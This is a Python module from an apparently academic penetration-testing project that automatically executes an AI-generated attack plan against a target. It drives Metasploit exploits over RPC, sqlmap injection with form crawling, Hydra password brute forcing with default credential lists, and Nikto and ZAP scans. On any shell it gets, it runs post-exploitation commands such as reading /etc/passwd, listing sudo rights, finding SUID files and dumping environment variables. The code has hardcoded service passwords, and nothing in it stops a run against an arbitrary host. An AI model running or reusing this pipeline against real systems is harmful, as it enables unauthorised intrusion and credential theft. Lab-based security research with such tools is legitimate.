"""
AEGIS core/attack_engine.py
=============================
Executes the attack plan generated by ai_engine.py.

Takes the structured JSON plan and runs the right tool automatically:
  - Metasploit  → via pymetasploit3 RPC client
  - SQLMap      → via subprocess (finds SQLi, dumps data)
  - Hydra       → via subprocess (brute forces credentials)
  - Nikto       → via subprocess (web server vulnerabilities)
  - ZAP         → via REST API (active web app attack)
  - Manual      → returns instructions for manual testing

Every attack is logged to the database (AttackLog model) and
evidence is saved for the DFIR pipeline.

IMPORTANT: Only use against systems you have authorisation to test.
This tool is designed for controlled lab environments (DVWA, Juice Shop,
Metasploitable) as part of an academic security research project.
"""

import subprocess
import json
import os
import time
import hashlib
import threading
from datetime import datetime
from django.conf import settings


# ─────────────────────────────────────────────────────────────────────────────
# MAIN ATTACK ORCHESTRATOR
# ─────────────────────────────────────────────────────────────────────────────

class AttackOrchestrator:
    """
    Receives an AI-generated attack plan and executes each step.
    Logs everything to DB and saves evidence for forensics.
    """

    def __init__(self, scan_result, attack_plan: dict):
        """
        scan_result: ScanResult Django model instance
        attack_plan: dict returned by ai_engine.generate_attack_plan()
        """
        self.scan_result   = scan_result
        self.attack_plan   = attack_plan
        self.target        = attack_plan.get("target", scan_result.target)
        self.results       = []
        self.evidence_dir  = f"evidence/{scan_result.id}"
        os.makedirs(self.evidence_dir, exist_ok=True)

    def execute(self) -> dict:
        """
        Main entry point. Executes each attack in priority order.
        Returns a summary dict with all results.
        """
        sequence = self.attack_plan.get("attack_sequence", [])

        if not sequence:
            return {
                "status": "NO_ATTACKS",
                "message": "AI found no exploitable vulnerabilities",
                "results": []
            }

        # Sort by priority (1 = highest)
        sequence = sorted(sequence, key=lambda x: x.get("priority", 99))

        for attack in sequence:
            tool = attack.get("tool", "manual").lower()
            result = self._execute_single_attack(attack, tool)
            self.results.append(result)

            # If we got a shell, run post-exploitation
            if result.get("success") and result.get("shell"):
                post = self._post_exploitation(result["shell"])
                result["post_exploitation"] = post

        return {
            "status":        "COMPLETE",
            "target":        self.target,
            "attacks_run":   len(self.results),
            "successful":    sum(1 for r in self.results if r.get("success")),
            "results":       self.results,
            "evidence_dir":  self.evidence_dir,
            "timestamp":     datetime.now().isoformat()
        }

    def _execute_single_attack(self, attack: dict, tool: str) -> dict:
        """Routes to the correct tool handler."""
        from scanner_ui.models import AttackLog

        # Log to DB before executing
        log = AttackLog.objects.create(
            scan        = self.scan_result,
            tool_used   = tool,
            module      = attack.get("module") or attack.get("command") or "unknown",  # fix
            target_port = attack.get("port"),
            status      = "RUNNING"
        )

        try:
            if tool == "metasploit":
                result = self._run_metasploit(attack)
            elif tool == "sqlmap":
                result = self._run_sqlmap(attack)
            elif tool == "hydra":
                result = self._run_hydra(attack)
            elif tool == "nikto":
                result = self._run_nikto(attack)
            elif tool == "zap":
                result = self._run_zap(attack)
            else:
                result = self._manual_instructions(attack)

            # Update DB log
            log.status  = "SUCCESS" if result.get("success") else "FAILED"
            log.output  = result.get("output", "")[:5000]
            log.session_id = result.get("session_id", "")
            log.save()

            result["vulnerability"] = attack.get("vulnerability", "")
            result["tool"]          = tool
            result["port"]          = attack.get("port")

            # Save evidence
            self._save_evidence(result, attack)

            return result

        except Exception as e:
            log.status = "ERROR"
            log.output = str(e)
            log.save()
            return {
                "success": False,
                "tool":    tool,
                "error":   str(e),
                "output":  f"Attack execution error: {str(e)}"
            }

    # ─────────────────────────────────────────────────────────────────────────
    # METASPLOIT
    # ─────────────────────────────────────────────────────────────────────────

    def _run_metasploit(self, attack: dict) -> dict:
        """
        Runs a Metasploit module via pymetasploit3 RPC.

        Requires Metasploit RPC server running:
          msfconsole -q -x "load msgrpc Pass=aegis123 ServerPort=55553"
        Or via Docker:
          docker run -it metasploitframework/metasploit-framework ./msfconsole
        """
        module  = attack.get("module", "")
        options = attack.get("options", {})
        payload = attack.get("payload", "")

        # Ensure RHOSTS is set
        if "RHOSTS" not in options:
            options["RHOSTS"] = self.target

        try:
            from pymetasploit3.msfrpc import MsfRpcClient

            # Connect to Metasploit RPC
            # Default: localhost:55553, password: aegis123
            msf_host = getattr(settings, 'METASPLOIT_HOST', 'localhost')
            msf_port = int(getattr(settings, 'METASPLOIT_PORT', 55553))
            msf_pass = getattr(settings, 'METASPLOIT_PASS', 'aegis123')

            client = MsfRpcClient(msf_pass, server=msf_host, port=msf_port, ssl=False)

            # Load the module
            exploit = client.modules.use('exploit', module)

            # Set all options
            for key, value in options.items():
                exploit[key] = value

            # Set payload if specified
            if payload:
                exploit['PAYLOAD'] = payload

            # Execute
            job = exploit.execute(payload=payload if payload else None)
            job_id = job.get('job_id')

            # Wait for job to finish (max 30 seconds)
            output = ""
            for _ in range(30):
                time.sleep(1)
                sessions = client.sessions.list
                if sessions:
                    session_id = list(sessions.keys())[-1]
                    session = client.sessions.session(session_id)
                    # Run basic post-exploitation commands
                    session.write("id\n")
                    time.sleep(1)
                    output = session.read()
                    return {
                        "success":    True,
                        "output":     f"Shell obtained!\n{output}",
                        "session_id": str(session_id),
                        "shell":      session,
                        "module":     module
                    }

            return {
                "success": False,
                "output":  f"Module executed but no session created. Job ID: {job_id}",
                "module":  module
            }

        except ConnectionRefusedError:
            return {
                "success": False,
                "output":  (
                    "[METASPLOIT NOT RUNNING]\n"
                    "Start Metasploit RPC with:\n"
                    "  msfconsole -q -x \"load msgrpc Pass=aegis123 ServerPort=55553\"\n"
                    f"Module that would run: {module}\n"
                    f"Options: {json.dumps(options, indent=2)}"
                ),
                "module": module
            }
        except Exception as e:
            return {
                "success": False,
                "output":  f"Metasploit error: {str(e)}\nModule: {module}",
                "module":  module
            }

    # ─────────────────────────────────────────────────────────────────────────
    # SQLMAP
    # ─────────────────────────────────────────────────────────────────────────

    def _run_sqlmap(self, attack: dict) -> dict:
        """
        Runs SQLMap to detect and exploit SQL injection.
        Automatically finds injection points and dumps data.
        """
        port    = attack.get("port", 80)
        options = attack.get("options", {})
        scheme  = "https" if port == 443 else "http"
        url     = options.get("url", f"{scheme}://{self.target}:{port}/")

        output_dir = f"{self.evidence_dir}/sqlmap"
        os.makedirs(output_dir, exist_ok=True)

        try:
            cmd = [
                "sqlmap",
                "-u", url,
                "--batch",           # no interactive prompts
                "--level", "3",      # thorough testing
                "--risk", "2",
                "--dbs",             # enumerate databases
                "--output-dir", output_dir,
                "--timeout", "30",
                "--forms",           # also test HTML forms
                "--crawl", "2",      # crawl 2 levels deep
            ]

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=120
            )

            output = result.stdout + result.stderr
            success = "injectable" in output.lower() or "sqlmap identified" in output.lower()

            return {
                "success": success,
                "output":  output[:3000],
                "url":     url,
                "tool":    "sqlmap"
            }

        except FileNotFoundError:
            return {"success": False, "output": "[ERROR] sqlmap not installed (apt install sqlmap)"}
        except subprocess.TimeoutExpired:
            return {"success": False, "output": "[TIMEOUT] SQLMap exceeded 2 minutes"}
        except Exception as e:
            return {"success": False, "output": f"SQLMap error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # HYDRA — credential brute forcing
    # ─────────────────────────────────────────────────────────────────────────

    def _run_hydra(self, attack: dict) -> dict:
        """
        Runs Hydra to brute-force login credentials.
        Tries common username/password combinations against the service.
        """
        port    = attack.get("port", 22)
        service = attack.get("service", "ssh").lower()
        options = attack.get("options", {})

        # Common credentials wordlists
        userlist = "/usr/share/wordlists/metasploit/unix_users.txt"
        passlist = "/usr/share/wordlists/rockyou.txt"

        # Fallback to small lists if full lists don't exist
        if not os.path.exists(userlist):
            # Write a small common list inline
            userlist = f"{self.evidence_dir}/users.txt"
            with open(userlist, "w") as f:
                f.write("admin\nroot\nuser\ntest\nguest\nwww-data\n")

        if not os.path.exists(passlist):
            passlist = f"{self.evidence_dir}/passwords.txt"
            with open(passlist, "w") as f:
                f.write("admin\npassword\n123456\nroot\ntoor\npassword123\nadmin123\n")

        try:
            # Map service to Hydra protocol
            protocol_map = {
                "ssh":   "ssh",
                "ftp":   "ftp",
                "http":  "http-get",
                "https": "https-get",
                "smtp":  "smtp",
                "mysql": "mysql",
            }
            protocol = protocol_map.get(service, service)

            cmd = [
                "hydra",
                "-L", userlist,
                "-P", passlist,
                "-t", "4",          # 4 threads (polite)
                "-f",               # stop after first found
                "-V",               # verbose
                f"{self.target}",
                protocol,
                "-s", str(port),
            ]

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=120
            )

            output  = result.stdout + result.stderr
            success = "login:" in output.lower() and "password:" in output.lower()

            # Extract found credentials
            creds = []
            for line in output.splitlines():
                if "login:" in line.lower() and "password:" in line.lower():
                    creds.append(line.strip())

            return {
                "success":     success,
                "output":      output[:3000],
                "credentials": creds,
                "service":     service,
                "port":        port
            }

        except FileNotFoundError:
            return {"success": False, "output": "[ERROR] hydra not installed (apt install hydra)"}
        except subprocess.TimeoutExpired:
            return {"success": False, "output": "[TIMEOUT] Hydra exceeded 2 minutes"}
        except Exception as e:
            return {"success": False, "output": f"Hydra error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # NIKTO — web server scanner
    # ─────────────────────────────────────────────────────────────────────────

    def _run_nikto(self, attack: dict) -> dict:
        """
        Runs Nikto for web server vulnerability detection and exploitation hints.
        """
        port   = attack.get("port", 80)
        scheme = "https" if port == 443 else "http"
        url    = f"{scheme}://{self.target}:{port}"

        output_file = f"{self.evidence_dir}/nikto_{port}.txt"

        try:
            cmd = [
                "nikto",
                "-h", url,
                "-o", output_file,
                "-Format", "txt",
                "-timeout", "10",
                "-maxtime", "120s",
            ]

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=150
            )

            output  = result.stdout + result.stderr
            success = "osvdb" in output.lower() or "+" in output

            return {
                "success":     success,
                "output":      output[:3000],
                "output_file": output_file,
                "url":         url
            }

        except FileNotFoundError:
            return {"success": False, "output": "[ERROR] nikto not installed (apt install nikto)"}
        except subprocess.TimeoutExpired:
            return {"success": False, "output": "[TIMEOUT] Nikto exceeded time limit"}
        except Exception as e:
            return {"success": False, "output": f"Nikto error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # ZAP — active web attack
    # ─────────────────────────────────────────────────────────────────────────

    def _run_zap(self, attack: dict) -> dict:
        """
        Runs OWASP ZAP active scan via its REST API.
        ZAP must be running as a daemon (already in docker-compose).
        """
        import requests as req

        port   = attack.get("port", 80)
        scheme = "https" if port == 443 else "http"
        url    = f"{scheme}://{self.target}:{port}"

        ZAP_API = "http://localhost:8090"
        ZAP_KEY = "aegis_zap_key"

        try:
            # Start active scan
            resp = req.get(
                f"{ZAP_API}/JSON/ascan/action/scan/",
                params={"url": url, "apikey": ZAP_KEY},
                timeout=10
            )
            scan_id = resp.json().get("scan")

            # Wait for completion (max 3 minutes)
            for _ in range(60):
                time.sleep(3)
                status = req.get(
                    f"{ZAP_API}/JSON/ascan/view/status/",
                    params={"scanId": scan_id, "apikey": ZAP_KEY},
                    timeout=5
                ).json().get("status", "0")
                if status == "100":
                    break

            # Get alerts
            alerts = req.get(
                f"{ZAP_API}/JSON/alert/view/alerts/",
                params={"baseurl": url, "apikey": ZAP_KEY},
                timeout=10
            ).json().get("alerts", [])

            high_alerts = [a for a in alerts if a.get("risk") in ["High", "Critical"]]
            output = "\n".join([
                f"[{a.get('risk')}] {a.get('alert')} — {a.get('url')}"
                for a in alerts[:20]
            ])

            return {
                "success": len(high_alerts) > 0,
                "output":  output or "No alerts found",
                "alerts":  len(alerts),
                "high":    len(high_alerts)
            }

        except req.exceptions.ConnectionError:
            return {
                "success": False,
                "output":  "[ZAP NOT RUNNING] ZAP daemon not reachable at localhost:8090"
            }
        except Exception as e:
            return {"success": False, "output": f"ZAP error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # MANUAL INSTRUCTIONS
    # ─────────────────────────────────────────────────────────────────────────

    def _manual_instructions(self, attack: dict) -> dict:
        """
        For vulnerabilities that require manual testing, returns
        clear step-by-step instructions.
        """
        return {
            "success": None,   # Neither success nor failure — requires manual action
            "output":  (
                f"[MANUAL TESTING REQUIRED]\n\n"
                f"Vulnerability: {attack.get('vulnerability', 'Unknown')}\n"
                f"Port: {attack.get('port', 'N/A')}\n\n"
                f"Steps:\n{attack.get('command', 'See vulnerability details')}\n\n"
                f"Expected outcome: {attack.get('expected_outcome', 'Unknown')}\n\n"
                f"Fallback: {attack.get('fallback', 'N/A')}"
            ),
            "tool": "manual"
        }

    # ─────────────────────────────────────────────────────────────────────────
    # POST-EXPLOITATION
    # ─────────────────────────────────────────────────────────────────────────

    def _post_exploitation(self, session) -> list:
        """
        Runs post-exploitation commands on a Metasploit session.
        Collects evidence: users, sudo rights, SUID files, network info.
        """
        commands = [
            "id",
            "whoami",
            "uname -a",
            "cat /etc/passwd",
            "sudo -l",
            "find / -perm -4000 2>/dev/null | head -20",
            "ifconfig || ip a",
            "netstat -tulpn 2>/dev/null || ss -tulpn",
            "ps aux | head -20",
            "env",
        ]

        results = []
        try:
            for cmd in commands:
                session.write(cmd + "\n")
                time.sleep(0.5)
                output = session.read()
                results.append({"command": cmd, "output": output})
                # Save to evidence
                self._append_evidence("post_exploitation.txt",
                                      f"$ {cmd}\n{output}\n\n")
        except Exception as e:
            results.append({"command": "error", "output": str(e)})

        return results

    # ─────────────────────────────────────────────────────────────────────────
    # EVIDENCE COLLECTION
    # ─────────────────────────────────────────────────────────────────────────

    def _save_evidence(self, result: dict, attack: dict):
        """
        Saves attack output as forensic evidence with hash for chain of custody.
        """
        from scanner_ui.models import ForensicEvidence

        evidence_content = json.dumps({
            "timestamp":     datetime.now().isoformat(),
            "target":        self.target,
            "vulnerability": attack.get("vulnerability", ""),
            "tool":          attack.get("tool", ""),
            "module":        attack.get("module", ""),
            "result":        result
        }, indent=2)

        # Write evidence file
        filename = f"{self.evidence_dir}/attack_{attack.get('tool', 'unknown')}_{attack.get('port', 0)}.json"
        with open(filename, "w") as f:
            f.write(evidence_content)

        # Calculate SHA256 for chain of custody
        sha256 = hashlib.sha256(evidence_content.encode()).hexdigest()

        # Save to DB
        ForensicEvidence.objects.create(
            scan          = self.scan_result,
            evidence_type = "LOG",
            file_path     = filename,
            sha256_hash   = sha256,
            description   = f"{attack.get('tool', '')} attack on port {attack.get('port', '')} — {'SUCCESS' if result.get('success') else 'FAILED'}"
        )

    def _append_evidence(self, filename: str, content: str):
        """Appends content to an evidence file."""
        path = f"{self.evidence_dir}/{filename}"
        with open(path, "a") as f:
            f.write(content)


# ─────────────────────────────────────────────────────────────────────────────
# CELERY TASK — runs the full attack pipeline in background
# ─────────────────────────────────────────────────────────────────────────────

def run_attack_pipeline(scan_result_id: int) -> dict:
    """
    Full pipeline called from the Celery task:
    1. Load scan results from DB
    2. Generate AI attack plan
    3. Execute attacks
    4. Return results

    Called from views.py when user clicks Execute Breach Sequence.
    """
    from scanner_ui.models import ScanResult
    from core.ai_engine import generate_attack_plan

    try:
        scan = ScanResult.objects.get(id=scan_result_id)
        scan_results = scan.raw_data

        # Step 1: AI generates the attack plan
        attack_plan = generate_attack_plan(scan_results, scan.target)

        # Step 2: Execute the plan
        orchestrator = AttackOrchestrator(scan, attack_plan)
        execution_results = orchestrator.execute()

        # Step 3: Save attack results back to scan record
        scan.raw_data["attack_plan"]    = attack_plan
        scan.raw_data["attack_results"] = execution_results
        scan.save()

        return {
            "status":      "COMPLETE",
            "scan_id":     scan_result_id,
            "attack_plan": attack_plan,
            "results":     execution_results
        }

    except ScanResult.DoesNotExist:
        return {"status": "ERROR", "message": f"Scan {scan_result_id} not found"}
    except Exception as e:
        return {"status": "ERROR", "message": str(e)}